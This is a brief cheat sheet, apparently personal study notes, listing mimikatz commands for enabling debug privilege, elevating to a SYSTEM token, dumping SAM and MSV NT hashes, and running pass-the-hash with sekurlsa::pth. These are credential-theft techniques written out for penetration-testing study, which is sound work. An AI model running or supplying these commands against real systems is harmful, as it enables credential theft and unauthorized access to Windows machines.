mimikatz

Resources

  1. The Hacker Tools

Basic commands

  1. View privilege configurations (?):

privilege::debug

  • Required to perform actions such as lsadump::sam later on

  1. To impersonate a token:

token::elevate

  • particularly, a token from SYSTEM

  1. Dump the local Security Account Manager (SAM) NT hashes:

lsadump::sam

  1. Dumps NT hash by targeting the MSV1_0 Authentication Package:

lsadump::msv

  1. Revert to original token on mimikatz startup:

token::revert

  1. Performs Pass-the-Hash, Pass-the-Key, Overpass-the-hash:

sekurlsa::pth

a. /user : username to impersonate

b. /domain : fully qualified domain name

c. /ntlm : NT hash

d. /run : command to run

  • according to The Hacker Tools (refer link in "Resources" above), it defaults to cmd.exe

Last updated